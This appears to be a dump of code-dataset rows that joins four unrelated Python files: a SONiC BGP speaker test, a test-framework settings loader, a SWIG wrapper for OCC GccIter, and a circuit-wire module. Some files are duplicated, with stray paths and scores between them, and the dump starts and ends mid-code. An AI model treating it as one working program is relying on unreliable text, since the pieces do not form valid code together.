if available_ip not in exclude_ips:
generated_ips.append(IPNetwork(str(available_ip) + '/' + str(prefix.prefixlen)))
if len(generated_ips) == num:
break
return generated_ips
@pytest.mark.parametrize(
"ipv4, ipv6, mtu",
[ pytest.param(True, False, 1514), ],
)
def test_bgp_speaker(localhost, ansible_adhoc, testbed, ipv4, ipv6, mtu):
"""setup bgp speaker on T0 topology and verify routes advertised
by bgp speaker is received by T0 TOR
"""
hostname = testbed['dut']
ptf_hostname = testbed['ptf']
host = AnsibleHost(ansible_adhoc, hostname)
ptfhost = AnsibleHost(ansible_adhoc, ptf_hostname)
mg_facts = host.minigraph_facts(host=hostname)['ansible_facts']
host_facts = host.setup()['ansible_facts']
res = host.shell("sonic-cfggen -m -d -y /etc/sonic/constants.yml -v \"constants.deployment_id_asn_map[DEVICE_METADATA['localhost']['deployment_id']]\"")
bgp_speaker_asn = res['stdout']
vlan_ips = generate_ips(3, \
"%s/%s" % (mg_facts['minigraph_vlan_interfaces'][0]['addr'], mg_facts['minigraph_vlan_interfaces'][0]['prefixlen']),
[IPAddress(mg_facts['minigraph_vlan_interfaces'][0]['addr'])])
# three speaker ips, two from peer range, another is vlan ip [0]
speaker_ips = generate_ips(2, mg_facts['minigraph_bgp_peers_with_range'][0]['ip_range'][0], [])
speaker_ips.append(vlan_ips[0])
for ip in vlan_ips:
host.command("ip route flush %s/32" % ip.ip)
host.command("ip route add %s/32 dev %s" % (ip.ip, mg_facts['minigraph_vlan_interfaces'][0]['attachto']))
root_dir = "/root"
exabgp_dir = "/root/exabgp"
helper_dir = "/root/helpers"
port_num = [5000, 6000, 7000]
cfnames = ["config_1.ini", "config_2.ini", "config_3.ini"]
vlan_ports = []
for i in range(0, 3):
vlan_ports.append(mg_facts['minigraph_port_indices'][mg_facts['minigraph_vlans'][mg_facts['minigraph_vlan_interfaces'][0]['attachto']]['members'][i]])
ptfhost.file(path=exabgp_dir, state="directory")
ptfhost.file(path=helper_dir, state="directory")
ptfhost.copy(src="bgp_speaker/dump.py", dest=helper_dir)
ptfhost.copy(src="bgp_speaker/http_api.py", dest=helper_dir)
ptfhost.copy(src="bgp_speaker/announce_routes.py", dest=helper_dir)
# deploy config file
extra_vars = \
{ 'helper_dir': helper_dir,
'exabgp_dir': exabgp_dir,
'lo_addr' : mg_facts['minigraph_lo_interfaces'][0]['addr'],
'lo_addr_prefixlen' : mg_facts['minigraph_lo_interfaces'][0]['prefixlen'],
'vlan_addr' : mg_facts['minigraph_vlan_interfaces'][0]['addr'],
'peer_range': mg_facts['minigraph_bgp_peers_with_range'][0]['ip_range'][0],
'announce_prefix': '10.10.10.0/26',
'minigraph_portchannels' : mg_facts['minigraph_portchannels'],
'minigraph_vlans' : mg_facts['minigraph_vlans'],
'minigraph_port_indices' : mg_facts['minigraph_port_indices'],
'peer_asn' : mg_facts['minigraph_bgp_asn'],
'peer_asn' : mg_facts['minigraph_bgp_asn'],
'my_asn' : bgp_speaker_asn,
'vlan_ports' : vlan_ports,
'port_num' : port_num,
'speaker_ips': [str(ip) for ip in speaker_ips],
'vlan_ips': [str(ip) for ip in vlan_ips],
'cfnames': cfnames }
for i in range(0, 3):
extra_vars.update({ 'cidx':i })
extra_vars.update({ 'speaker_ip': str(speaker_ips[i].ip) })
ptfhost.host.options['variable_manager'].extra_vars.update(extra_vars)
ptfhost.template(src="bgp_speaker/config.j2", dest="%s/%s" % (exabgp_dir, cfnames[i]))
# deploy routes
ptfhost.template(src="bgp_speaker/routes.j2", dest="%s/%s" % (exabgp_dir, "routes"))
# deploy start script
ptfhost.template(src="bgp_speaker/start.j2", dest="%s/%s" % (exabgp_dir, "start.sh"), mode="u+rwx")
# kill exabgp
res = ptfhost.shell("pkill exabgp || true")
print res
# start exabgp instance
res = ptfhost.shell("bash %s/start.sh" % exabgp_dir)
print res
time.sleep(10)
# announce route
res = ptfhost.shell("nohup python %s/announce_routes.py %s/routes >/dev/null 2>&1 &" % (helper_dir, exabgp_dir))
print res
# make sure routes announced to dynamic bgp neighbors
time.sleep(60)
bgp_facts = host.bgp_facts()['ansible_facts']
# Verify bgp sessions are established
for k, v in bgp_facts['bgp_neighbors'].items():
assert v['state'] == 'established'
# Verify accepted prefixes of the dynamic neighbors are correct
for ip in speaker_ips:
assert bgp_facts['bgp_neighbors'][str(ip.ip)]['accepted prefixes'] == 1
assert bgp_facts['bgp_neighbors'][str(vlan_ips[0].ip)]['accepted prefixes'] == 1
# Generate route-port map information
ptfhost.template(src="bgp_speaker/bgp_speaker_route.j2", dest="/root/bgp_speaker_route.txt")
ptfhost.copy(src="ptftests", dest=root_dir)
ptf_runner(ptfhost, \
"ptftests",
"fib_test.FibTest",
platform_dir="ptftests",
params={"testbed_type": "t0",
"router_mac": host_facts['ansible_Ethernet0']['macaddress'],
"fib_info": "/root/bgp_speaker_route.txt",
"ipv4": ipv4,
"ipv6": ipv6,
"testbed_mtu": mtu },
log_file="/tmp/bgp_speaker_test.FibTest.log",
socket_recv_size=16384)
res = ptfhost.shell("pkill exabgp || true")
for ip in vlan_ips:
host.command("ip route flush %s/32" % ip.ip)
ptfhost.shell("ip addr flush dev eth{}".format(mg_facts['minigraph_port_indices'][mg_facts['minigraph_vlans'][mg_facts['minigraph_vlan_interfaces'][0]['attachto']]['members'][0]])) | 0.283881 | 0.167083 |
import os
import inspect
from ..utils.import_helper import ImportHelper
from ..core.errors import ImproperlyConfigured
from . import global_settings
from ..utils.lazy_obj import empty, LazyObject
__all__ = ['settings', 'SettingsFileFinder']
class SettingsFileFinder(object):
def __init__(self, settings_file_name='settings.py'):
self.__settings_file_name = settings_file_name
def is_py_package(self, dirpath):
return os.path.isdir(dirpath) and os.path.isfile(os.path.join(dirpath, '__init__.py'))
@property
def settings_file_name(self):
return self.__settings_file_name
def __issuite(self, tc):
"A crude way to tell apart testcases and suites with duck-typing"
try:
iter(tc)
except TypeError:
return False
return True
def __all_in_one(self, tc):
alltests = []
if self.__issuite(tc):
for one in tc:
if not self.__issuite(one):
alltests.append(one)
else:
alltests.extend(self.__all_in_one(one))
else:
alltests.append(tc)
return alltests
def __is_exists_file(self, path):
return os.path.exists(path) and os.path.isfile(path)
def find_settings_file_from_start_dir(self, dirpath):
""" 从给定的目录开始查找配置文件,如果在该目录能找到配置文件,则不会遍历其子目录,否则会一直遍历。
遍历完其下所有子孙目录后,仍找不到则返回None,找到则返回完整配置文件路径
Args:
dirpath: 开始查找的目录
"""
if not os.path.isdir(dirpath):
return None
filepath = os.path.join(dirpath, self.settings_file_name)
if not self.__is_exists_file(filepath):
filepath = self.__find_settings_file_from_subdir(dirpath)
return filepath
def __find_settings_file_from_subdir(self, dirpath):
names = os.listdir(dirpath)
settings_file_path = None
for name in names:
dpath = os.path.join(dirpath, name)
if os.path.isdir(dpath):
filepath = os.path.join(dpath, self.settings_file_name)
if self.__is_exists_file(filepath):
settings_file_path = filepath
break
else:
result = self.__find_settings_file_from_subdir(dpath)
if result:
settings_file_path = result
break
return settings_file_path
def set_non_py_package_dir_as_start_dir(self, abspath):
""" 设置开始查找配置文件的目录为第一个非python包的目录,
如果给定的路径中的目录没有非python包目录,则设置当前目录为开始查找配置文件的目录
Args:
abspath: 绝对路径
"""
if not os.path.exists(abspath):
return (None, None)
if os.path.isfile(abspath):
dirpath = os.path.dirname(abspath)
else:
dirpath = abspath
current_dirpath = dirpath
paths = []
start_dirpath = os.path.dirname(current_dirpath) # 从哪个路径开始查找配置文件 sconfig.py
while True:
if not self.is_py_package(dirpath):
start_dirpath = dirpath
break
if os.path.basename(dirpath):
paths.append(dirpath)
dirpath = os.path.dirname(dirpath)
else:
break
return start_dirpath
def find_settings_file_by_test(self, test):
used = set()
start_path = None
config_path = None
for t in self.__all_in_one(test):
mod = inspect.getmodule(t)
if mod in used:
continue
else:
used.add(mod)
file_path = os.path.abspath(mod.__file__)
start_path = self.set_non_py_package_dir_as_start_dir(file_path)
config_path = self.find_settings_file_from_start_dir(start_path)
if config_path:
break
return (start_path, config_path)
def find_settings_file_by_testcase_class(self, testclass):
start_path = None
config_path = None
mod = inspect.getmodule(testclass)
file_path = os.path.abspath(mod.__file__)
start_path = self.set_non_py_package_dir_as_start_dir(file_path)
config_path = self.find_settings_file_from_start_dir(start_path)
return (start_path, config_path)
class LazySettings(LazyObject):
"""
框架会在运行测试时去查找项目配置文件,并调用load_configure_from_file()方法载入配置文件中的配置
"""
def _setup(self):
self._wrapped = Settings()
def __repr__(self):
# Hardcode the class name as otherwise it yields 'Settings'.
if self._wrapped is empty:
return '<LazySettings [Unevaluated]>'
return '<LazySettings "%(settings_module_file_path)s">' % {
'settings_module_file_path': self._wrapped.SETTINGS_MODULE_FILE_PATH,
}
def __getattr__(self, name):
if self._wrapped is empty:
self._setup()
val = getattr(self._wrapped, name)
self.__dict__[name] = val
return val
def __setattr__(self, name, value):
if name == '_wrapped':
self.__dict__.clear()
else:
self.__dict__.pop(name, None)
super().__setattr__(name, value)
def __delattr__(self, name):
super().__delattr__(name)
self.__dict__.pop(name, None)
def load_configure_from_file(self, settings_module_filepath, force=False):
if force or (not self.is_loaded):
if self._wrapped is empty:
self._wrapped = Settings()
self._wrapped.load(settings_module_filepath)
@property
def configured(self):
return self._wrapped is not empty
@property
def is_loaded(self):
return self.configured and self._wrapped.is_loaded
class Settings(object):
def __init__(self):
for setting in dir(global_settings):
if setting.isupper():
setattr(self, setting, getattr(global_settings, setting))
self._explicit_settings = set()
self._is_loaded = False
self.SETTINGS_MODULE_FILE_PATH = None
def load(self, settings_module_filepath):
self.SETTINGS_MODULE_FILE_PATH = settings_module_filepath
mod = ImportHelper().load_module(self.SETTINGS_MODULE_FILE_PATH)
tuple_settings = ()
for setting in dir(mod):
if setting.isupper():
setting_value = getattr(mod, setting)
if (setting in tuple_settings and not isinstance(setting_value, (list, tuple))):
raise ImproperlyConfigured("The %s setting must be a list or a tuple. " % setting)
setattr(self, setting, setting_value)
self._explicit_settings.add(setting)
self._is_loaded = True
def is_overridden(self, setting):
return setting in self._explicit_settings
@property
def is_loaded(self):
return self._is_loaded
def __repr__(self):
return '<%(cls)s "%(settings_module_file_path)s">' % {
'cls': self.__class__.__name__,
'settings_module_file_path': self.SETTINGS_MODULE_FILE_PATH,
}
settings = LazySettings() | stest/conf/__init__.py | import os
import inspect
from ..utils.import_helper import ImportHelper
from ..core.errors import ImproperlyConfigured
from . import global_settings
from ..utils.lazy_obj import empty, LazyObject
__all__ = ['settings', 'SettingsFileFinder']
class SettingsFileFinder(object):
def __init__(self, settings_file_name='settings.py'):
self.__settings_file_name = settings_file_name
def is_py_package(self, dirpath):
return os.path.isdir(dirpath) and os.path.isfile(os.path.join(dirpath, '__init__.py'))
@property
def settings_file_name(self):
return self.__settings_file_name
def __issuite(self, tc):
"A crude way to tell apart testcases and suites with duck-typing"
try:
iter(tc)
except TypeError:
return False
return True
def __all_in_one(self, tc):
alltests = []
if self.__issuite(tc):
for one in tc:
if not self.__issuite(one):
alltests.append(one)
else:
alltests.extend(self.__all_in_one(one))
else:
alltests.append(tc)
return alltests
def __is_exists_file(self, path):
return os.path.exists(path) and os.path.isfile(path)
def find_settings_file_from_start_dir(self, dirpath):
""" 从给定的目录开始查找配置文件,如果在该目录能找到配置文件,则不会遍历其子目录,否则会一直遍历。
遍历完其下所有子孙目录后,仍找不到则返回None,找到则返回完整配置文件路径
Args:
dirpath: 开始查找的目录
"""
if not os.path.isdir(dirpath):
return None
filepath = os.path.join(dirpath, self.settings_file_name)
if not self.__is_exists_file(filepath):
filepath = self.__find_settings_file_from_subdir(dirpath)
return filepath
def __find_settings_file_from_subdir(self, dirpath):
names = os.listdir(dirpath)
settings_file_path = None
for name in names:
dpath = os.path.join(dirpath, name)
if os.path.isdir(dpath):
filepath = os.path.join(dpath, self.settings_file_name)
if self.__is_exists_file(filepath):
settings_file_path = filepath
break
else:
result = self.__find_settings_file_from_subdir(dpath)
if result:
settings_file_path = result
break
return settings_file_path
def set_non_py_package_dir_as_start_dir(self, abspath):
""" 设置开始查找配置文件的目录为第一个非python包的目录,
如果给定的路径中的目录没有非python包目录,则设置当前目录为开始查找配置文件的目录
Args:
abspath: 绝对路径
"""
if not os.path.exists(abspath):
return (None, None)
if os.path.isfile(abspath):
dirpath = os.path.dirname(abspath)
else:
dirpath = abspath
current_dirpath = dirpath
paths = []
start_dirpath = os.path.dirname(current_dirpath) # 从哪个路径开始查找配置文件 sconfig.py
while True:
if not self.is_py_package(dirpath):
start_dirpath = dirpath
break
if os.path.basename(dirpath):
paths.append(dirpath)
dirpath = os.path.dirname(dirpath)
else:
break
return start_dirpath
def find_settings_file_by_test(self, test):
used = set()
start_path = None
config_path = None
for t in self.__all_in_one(test):
mod = inspect.getmodule(t)
if mod in used:
continue
else:
used.add(mod)
file_path = os.path.abspath(mod.__file__)
start_path = self.set_non_py_package_dir_as_start_dir(file_path)
config_path = self.find_settings_file_from_start_dir(start_path)
if config_path:
break
return (start_path, config_path)
def find_settings_file_by_testcase_class(self, testclass):
start_path = None
config_path = None
mod = inspect.getmodule(testclass)
file_path = os.path.abspath(mod.__file__)
start_path = self.set_non_py_package_dir_as_start_dir(file_path)
config_path = self.find_settings_file_from_start_dir(start_path)
return (start_path, config_path)
class LazySettings(LazyObject):
"""
框架会在运行测试时去查找项目配置文件,并调用load_configure_from_file()方法载入配置文件中的配置
"""
def _setup(self):
self._wrapped = Settings()
def __repr__(self):
# Hardcode the class name as otherwise it yields 'Settings'.
if self._wrapped is empty:
return '<LazySettings [Unevaluated]>'
return '<LazySettings "%(settings_module_file_path)s">' % {
'settings_module_file_path': self._wrapped.SETTINGS_MODULE_FILE_PATH,
}
def __getattr__(self, name):
if self._wrapped is empty:
self._setup()
val = getattr(self._wrapped, name)
self.__dict__[name] = val
return val
def __setattr__(self, name, value):
if name == '_wrapped':
self.__dict__.clear()
else:
self.__dict__.pop(name, None)
super().__setattr__(name, value)
def __delattr__(self, name):
super().__delattr__(name)
self.__dict__.pop(name, None)
def load_configure_from_file(self, settings_module_filepath, force=False):
if force or (not self.is_loaded):
if self._wrapped is empty:
self._wrapped = Settings()
self._wrapped.load(settings_module_filepath)
@property
def configured(self):
return self._wrapped is not empty
@property
def is_loaded(self):
return self.configured and self._wrapped.is_loaded
class Settings(object):
def __init__(self):
for setting in dir(global_settings):
if setting.isupper():
setattr(self, setting, getattr(global_settings, setting))
self._explicit_settings = set()
self._is_loaded = False
self.SETTINGS_MODULE_FILE_PATH = None
def load(self, settings_module_filepath):
self.SETTINGS_MODULE_FILE_PATH = settings_module_filepath
mod = ImportHelper().load_module(self.SETTINGS_MODULE_FILE_PATH)
tuple_settings = ()
for setting in dir(mod):
if setting.isupper():
setting_value = getattr(mod, setting)
if (setting in tuple_settings and not isinstance(setting_value, (list, tuple))):
raise ImproperlyConfigured("The %s setting must be a list or a tuple. " % setting)
setattr(self, setting, setting_value)
self._explicit_settings.add(setting)
self._is_loaded = True
def is_overridden(self, setting):
return setting in self._explicit_settings
@property
def is_loaded(self):
return self._is_loaded
def __repr__(self):
return '<%(cls)s "%(settings_module_file_path)s">' % {
'cls': self.__class__.__name__,
'settings_module_file_path': self.SETTINGS_MODULE_FILE_PATH,
}
settings = LazySettings() | 0.324663 | 0.09118 |
from sys import version_info
if version_info >= (3,0,0):
new_instancemethod = lambda func, inst, cls: _GccIter.SWIG_PyInstanceMethod_New(func)
else:
from new import instancemethod as new_instancemethod
if version_info >= (2,6,0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_GccIter', [dirname(__file__)])
except ImportError:
import _GccIter
return _GccIter
if fp is not None:
try:
_mod = imp.load_module('_GccIter', fp, pathname, description)
finally:
fp.close()
return _mod
_GccIter = swig_import_helper()
del swig_import_helper
else:
import _GccIter
del version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self,class_type,name,value,static=1):
if (name == "thisown"): return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name,None)
if method: return method(self,value)
if (not static):
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self,class_type,name,value):
return _swig_setattr_nondynamic(self,class_type,name,value,0)
def _swig_getattr(self,class_type,name):
if (name == "thisown"): return self.this.own()
method = class_type.__swig_getmethods__.get(name,None)
if method: return method(self)
raise AttributeError(name)
def _swig_repr(self):
try: strthis = "proxy of " + self.this.__repr__()
except: strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except AttributeError:
class _object : pass
_newclass = 0
def _swig_setattr_nondynamic_method(set):
def set_attr(self,name,value):
if (name == "thisown"): return self.this.own(value)
if hasattr(self,name) or (name == "this"):
set(self,name,value)
else:
raise AttributeError("You cannot add attributes to %s" % self)
return set_attr
class SwigPyIterator(object):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
def __init__(self, *args, **kwargs): raise AttributeError("No constructor defined - class is abstract")
__repr__ = _swig_repr
__swig_destroy__ = _GccIter.delete_SwigPyIterator
def __iter__(self): return self
SwigPyIterator.value = new_instancemethod(_GccIter.SwigPyIterator_value,None,SwigPyIterator)
SwigPyIterator.incr = new_instancemethod(_GccIter.SwigPyIterator_incr,None,SwigPyIterator)
SwigPyIterator.decr = new_instancemethod(_GccIter.SwigPyIterator_decr,None,SwigPyIterator)
SwigPyIterator.distance = new_instancemethod(_GccIter.SwigPyIterator_distance,None,SwigPyIterator)
SwigPyIterator.equal = new_instancemethod(_GccIter.SwigPyIterator_equal,None,SwigPyIterator)
SwigPyIterator.copy = new_instancemethod(_GccIter.SwigPyIterator_copy,None,SwigPyIterator)
SwigPyIterator.next = new_instancemethod(_GccIter.SwigPyIterator_next,None,SwigPyIterator)
SwigPyIterator.__next__ = new_instancemethod(_GccIter.SwigPyIterator___next__,None,SwigPyIterator)
SwigPyIterator.previous = new_instancemethod(_GccIter.SwigPyIterator_previous,None,SwigPyIterator)
SwigPyIterator.advance = new_instancemethod(_GccIter.SwigPyIterator_advance,None,SwigPyIterator)
SwigPyIterator.__eq__ = new_instancemethod(_GccIter.SwigPyIterator___eq__,None,SwigPyIterator)
SwigPyIterator.__ne__ = new_instancemethod(_GccIter.SwigPyIterator___ne__,None,SwigPyIterator)
SwigPyIterator.__iadd__ = new_instancemethod(_GccIter.SwigPyIterator___iadd__,None,SwigPyIterator)
SwigPyIterator.__isub__ = new_instancemethod(_GccIter.SwigPyIterator___isub__,None,SwigPyIterator)
SwigPyIterator.__add__ = new_instancemethod(_GccIter.SwigPyIterator___add__,None,SwigPyIterator)
SwigPyIterator.__sub__ = new_instancemethod(_GccIter.SwigPyIterator___sub__,None,SwigPyIterator)
SwigPyIterator_swigregister = _GccIter.SwigPyIterator_swigregister
SwigPyIterator_swigregister(SwigPyIterator)
GccIter_CuCuCu = _GccIter.GccIter_CuCuCu
GccIter_CiCuCu = _GccIter.GccIter_CiCuCu
GccIter_CiCiCu = _GccIter.GccIter_CiCiCu
GccIter_CiLiCu = _GccIter.GccIter_CiLiCu
GccIter_LiLiCu = _GccIter.GccIter_LiLiCu
GccIter_LiCuCu = _GccIter.GccIter_LiCuCu
GccIter_CuCuOnCu = _GccIter.GccIter_CuCuOnCu
GccIter_CiCuOnCu = _GccIter.GccIter_CiCuOnCu
GccIter_LiCuOnCu = _GccIter.GccIter_LiCuOnCu
GccIter_CuPtOnCu = _GccIter.GccIter_CuPtOnCu
GccIter_CuCuOnLi = _GccIter.GccIter_CuCuOnLi
GccIter_CiCuOnLi = _GccIter.GccIter_CiCuOnLi
GccIter_LiCuOnLi = _GccIter.GccIter_LiCuOnLi
GccIter_CuPtOnLi = _GccIter.GccIter_CuPtOnLi
GccIter_CuCuOnCi = _GccIter.GccIter_CuCuOnCi
GccIter_CiCuOnCi = _GccIter.GccIter_CiCuOnCi
GccIter_LiCuOnCi = _GccIter.GccIter_LiCuOnCi
GccIter_CuPtOnCi = _GccIter.GccIter_CuPtOnCi
GccIter_CuCu = _GccIter.GccIter_CuCu
GccIter_CiCu = _GccIter.GccIter_CiCu | Lib/site-packages/OCC/GccIter.py |
from sys import version_info
if version_info >= (3,0,0):
new_instancemethod = lambda func, inst, cls: _GccIter.SWIG_PyInstanceMethod_New(func)
else:
from new import instancemethod as new_instancemethod
if version_info >= (2,6,0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_GccIter', [dirname(__file__)])
except ImportError:
import _GccIter
return _GccIter
if fp is not None:
try:
_mod = imp.load_module('_GccIter', fp, pathname, description)
finally:
fp.close()
return _mod
_GccIter = swig_import_helper()
del swig_import_helper
else:
import _GccIter
del version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self,class_type,name,value,static=1):
if (name == "thisown"): return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name,None)
if method: return method(self,value)
if (not static):
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self,class_type,name,value):
return _swig_setattr_nondynamic(self,class_type,name,value,0)
def _swig_getattr(self,class_type,name):
if (name == "thisown"): return self.this.own()
method = class_type.__swig_getmethods__.get(name,None)
if method: return method(self)
raise AttributeError(name)
def _swig_repr(self):
try: strthis = "proxy of " + self.this.__repr__()
except: strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except AttributeError:
class _object : pass
_newclass = 0
def _swig_setattr_nondynamic_method(set):
def set_attr(self,name,value):
if (name == "thisown"): return self.this.own(value)
if hasattr(self,name) or (name == "this"):
set(self,name,value)
else:
raise AttributeError("You cannot add attributes to %s" % self)
return set_attr
class SwigPyIterator(object):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
def __init__(self, *args, **kwargs): raise AttributeError("No constructor defined - class is abstract")
__repr__ = _swig_repr
__swig_destroy__ = _GccIter.delete_SwigPyIterator
def __iter__(self): return self
SwigPyIterator.value = new_instancemethod(_GccIter.SwigPyIterator_value,None,SwigPyIterator)
SwigPyIterator.incr = new_instancemethod(_GccIter.SwigPyIterator_incr,None,SwigPyIterator)
SwigPyIterator.decr = new_instancemethod(_GccIter.SwigPyIterator_decr,None,SwigPyIterator)
SwigPyIterator.distance = new_instancemethod(_GccIter.SwigPyIterator_distance,None,SwigPyIterator)
SwigPyIterator.equal = new_instancemethod(_GccIter.SwigPyIterator_equal,None,SwigPyIterator)
SwigPyIterator.copy = new_instancemethod(_GccIter.SwigPyIterator_copy,None,SwigPyIterator)
SwigPyIterator.next = new_instancemethod(_GccIter.SwigPyIterator_next,None,SwigPyIterator)
SwigPyIterator.__next__ = new_instancemethod(_GccIter.SwigPyIterator___next__,None,SwigPyIterator)
SwigPyIterator.previous = new_instancemethod(_GccIter.SwigPyIterator_previous,None,SwigPyIterator)
SwigPyIterator.advance = new_instancemethod(_GccIter.SwigPyIterator_advance,None,SwigPyIterator)
SwigPyIterator.__eq__ = new_instancemethod(_GccIter.SwigPyIterator___eq__,None,SwigPyIterator)
SwigPyIterator.__ne__ = new_instancemethod(_GccIter.SwigPyIterator___ne__,None,SwigPyIterator)
SwigPyIterator.__iadd__ = new_instancemethod(_GccIter.SwigPyIterator___iadd__,None,SwigPyIterator)
SwigPyIterator.__isub__ = new_instancemethod(_GccIter.SwigPyIterator___isub__,None,SwigPyIterator)
SwigPyIterator.__add__ = new_instancemethod(_GccIter.SwigPyIterator___add__,None,SwigPyIterator)
SwigPyIterator.__sub__ = new_instancemethod(_GccIter.SwigPyIterator___sub__,None,SwigPyIterator)
SwigPyIterator_swigregister = _GccIter.SwigPyIterator_swigregister
SwigPyIterator_swigregister(SwigPyIterator)
GccIter_CuCuCu = _GccIter.GccIter_CuCuCu
GccIter_CiCuCu = _GccIter.GccIter_CiCuCu
GccIter_CiCiCu = _GccIter.GccIter_CiCiCu
GccIter_CiLiCu = _GccIter.GccIter_CiLiCu
GccIter_LiLiCu = _GccIter.GccIter_LiLiCu
GccIter_LiCuCu = _GccIter.GccIter_LiCuCu
GccIter_CuCuOnCu = _GccIter.GccIter_CuCuOnCu
GccIter_CiCuOnCu = _GccIter.GccIter_CiCuOnCu
GccIter_LiCuOnCu = _GccIter.GccIter_LiCuOnCu
GccIter_CuPtOnCu = _GccIter.GccIter_CuPtOnCu
GccIter_CuCuOnLi = _GccIter.GccIter_CuCuOnLi
GccIter_CiCuOnLi = _GccIter.GccIter_CiCuOnLi
GccIter_LiCuOnLi = _GccIter.GccIter_LiCuOnLi
GccIter_CuPtOnLi = _GccIter.GccIter_CuPtOnLi
GccIter_CuCuOnCi = _GccIter.GccIter_CuCuOnCi
GccIter_CiCuOnCi = _GccIter.GccIter_CiCuOnCi
GccIter_LiCuOnCi = _GccIter.GccIter_LiCuOnCi
GccIter_CuPtOnCi = _GccIter.GccIter_CuPtOnCi
GccIter_CuCu = _GccIter.GccIter_CuCu
GccIter_CiCu = _GccIter.GccIter_CiCu | 0.154153 | 0.081447 |
import json # Used when TRACE=jsonp
import os # Used to get the TRACE environment variable
import re # Used when TRACE=jsonp
import sys # Used to smooth over the range / xrange issue.
import aug_avl
# Python 3 doesn't have xrange, and range behaves like xrange.
if sys.version_info >= (3,):
xrange = range
# Circuit verification library.
class Wire(object):
"""A wire in an on-chip circuit.
Wires are immutable, and are either horizontal or vertical.
"""
def __init__(self, name, x1, y1, x2, y2):
"""Creates a wire.
Raises an ValueError if the coordinates don't make up a horizontal wire
or a vertical wire.
Args:
name: the wire's user-visible name
x1: the X coordinate of the wire's first endpoint
y1: the Y coordinate of the wire's first endpoint
x2: the X coordinate of the wire's last endpoint
y2: the Y coordinate of the wire's last endpoint
"""
# Normalize the coordinates.
if x1 > x2:
x1, x2 = x2, x1
if y1 > y2:
y1, y2 = y2, y1
self.name = name
self.x1, self.y1 = x1, y1
self.x2, self.y2 = x2, y2
self.object_id = Wire.next_object_id()
if not (self.is_horizontal() or self.is_vertical()):
raise ValueError(str(self) + ' is neither horizontal nor vertical')
def is_horizontal(self):
"""True if the wire's endpoints have the same Y coordinates."""
return self.y1 == self.y2
def is_vertical(self):
"""True if the wire's endpoints have the same X coordinates."""
return self.x1 == self.x2
def intersects(self, other_wire):
"""True if this wire intersects another wire."""
# NOTE: we assume that wires can only cross, but not overlap.
if self.is_horizontal() == other_wire.is_horizontal():
return False
if self.is_horizontal():
h = self
v = other_wire
else:
h = other_wire
v = self
return v.y1 <= h.y1 and h.y1 <= v.y2 and h.x1 <= v.x1 and v.x1 <= h.x2
def __repr__(self):
# :nodoc: nicer formatting to help with debugging
return('<wire ' + self.name + ' (' + str(self.x1) + ',' + str(self.y1) +
')-(' + str(self.x2) + ',' + str(self.y2) + ')>')
def as_json(self):
"""Dict that obeys the JSON format restrictions, representing the wire."""
return {'id': self.name, 'x': [self.x1, self.x2], 'y': [self.y1, self.y2]}
# Next number handed out by Wire.next_object_id()
_next_id = 0
@staticmethod
def next_object_id():
"""Returns a unique numerical ID to be used as a Wire's object_id."""
id = Wire._next_id
Wire._next_id += 1
return id
class WireLayer(object):
"""The layout of one layer of wires in a chip."""
def __init__(self):
"""Creates a layer layout with no wires."""
self.wires = {}
def wires(self):
"""The wires in the layout."""
self.wires.values()
def add_wire(self, name, x1, y1, x2, y2):
"""Adds a wire to a layer layout.
Args:
name: the wire's unique name
x1: the X coordinate of the wire's first endpoint
y1: the Y coordinate of the wire's first endpoint
x2: the X coordinate of the wire's last endpoint
y2: the Y coordinate of the wire's last endpoint
Raises an exception if the wire isn't perfectly horizontal (y1 = y2) or
perfectly vertical (x1 = x2)."""
if name in self.wires:
raise ValueError('Wire name ' + name + ' not unique')
self.wires[name] = Wire(name, x1, y1, x2, y2)
def as_json(self):
"""Dict that obeys the JSON format restrictions, representing the layout."""
return { 'wires': [wire.as_json() for wire in self.wires.values()] }
@staticmethod
def from_file(file):
"""Builds a wire layer layout by reading a textual description from a file.
Args:
file: a File object supplying the input
Returns a new Simulation instance."""
layer = WireLayer()
while True:
command = file.readline().split()
if command[0] == 'wire':
coordinates = [float(token) for token in command[2:6]]
layer.add_wire(command[1], *coordinates)
elif command[0] == 'done':
break
return layer
class RangeIndex(object):
"""Array-based range index implementation."""
def __init__(self):
"""Initially empty range index."""
self.data = aug_avl.AugAVL()
def add(self, key):
"""Inserts a key in the range index."""
if key is None:
raise ValueError('Cannot insert nil in the index')
self.data.insert(key)
def remove(self, key):
"""Removes a key from the range index."""
self.data.delete(key)
def list(self, first_key, last_key):
"""List of values for the keys that fall within [first_key, last_key]."""
return self.data.list(first_key, last_key)
def count(self, first_key, last_key):
"""Number of keys that fall within [first_key, last_key]."""
return self.data.count(first_key, last_key)
class TracedRangeIndex(RangeIndex):
"""Augments RangeIndex to build a trace for the visualizer."""
def __init__(self, trace):
"""Sets the object receiving tracing info."""
RangeIndex.__init__(self)
self.trace = trace
def add(self, key):
self.trace.append({'type': 'add', 'id': key.wire.name})
RangeIndex.add(self, key)
def remove(self, key):
self.trace.append({'type': 'delete', 'id': key.wire.name})
RangeIndex.remove(self, key)
def list(self, first_key, last_key):
result = RangeIndex.list(self, first_key, last_key)
self.trace.append({'type': 'list', 'from': first_key.key,
'to': last_key.key,
'ids': [key.wire.name for key in result]})
return result
def count(self, first_key, last_key):
result = RangeIndex.count(self, first_key, last_key)
self.trace.append({'type': 'list', 'from': first_key.key,
'to': last_key.key, 'count': result})
